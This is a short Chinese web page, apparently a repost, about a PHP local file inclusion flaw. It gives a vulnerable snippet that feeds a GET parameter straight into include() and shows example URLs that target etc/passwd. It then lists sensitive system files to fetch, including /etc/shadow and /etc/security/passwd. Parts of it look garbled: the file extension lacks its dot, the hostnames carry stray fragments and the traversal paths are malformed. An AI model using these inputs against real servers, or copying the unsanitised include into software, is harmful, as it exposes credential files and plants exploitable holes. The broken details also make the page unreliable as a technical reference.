代码:
复制代码 代码如下:
<?php $page=$_GET['page']; include($page.'php'); ?>
你可以这样使用 http://HdhCmsTestxxx测试数据/index.php?page=etc/passwd http://HdhCmsTestxxx测试数据/index.php?page=etc/passwd http://HdhCmsTestxxx测试数据/index.php?page=..etc/passwd 获取更多数据: etc/profile etc/services /etc/passwd /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits /usr/lib/security/mkuser.default 来自hackteach查看更多关于php 伪造本地文件包含漏洞的代码,大家一定要注意的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did7086